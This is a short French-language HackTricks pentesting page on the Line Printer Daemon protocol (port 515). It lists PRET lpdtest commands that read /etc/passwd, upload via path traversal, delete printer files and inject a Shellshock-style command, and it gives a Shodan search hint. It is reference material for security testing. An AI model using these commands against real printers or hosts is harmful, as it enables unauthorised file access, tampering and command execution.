hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
2023-06-03 13:10:46 +00:00

3.1 KiB

Le protocole Line Printer Daemon (LPD) a été initialement introduit dans Berkeley Unix dans les années 80 (plus tard spécifié par RFC1179).
Le démon fonctionne sur le port 515/tcp et peut être accédé en utilisant la commande lpr. Pour imprimer, le client envoie un fichier de contrôle définissant le travail/nom d'utilisateur et un fichier de données contenant les données réelles à imprimer. Le type d'entrée du fichier de données peut être défini dans le fichier de contrôle en choisissant parmi divers formats de fichier. Cependant, c'est à l'implémentation LPD de décider comment gérer les données d'impression. Une implémentation LPD populaire pour les systèmes d'exploitation de type Unix est LPRng. LPD peut être utilisé comme vecteur pour déployer des travaux d'impression PostScript ou PJL malveillants.

Les outils lpdprint et lpdtest sont inclus dans PRET. Ils sont un moyen minimaliste d'imprimer des données directement sur une imprimante compatible LPD ou de télécharger/téléverser/supprimer des fichiers et plus encore :

lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local

Si vous voulez en savoir plus sur le piratage d'imprimantes, lisez cette page.

Shodan

  • port 515
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥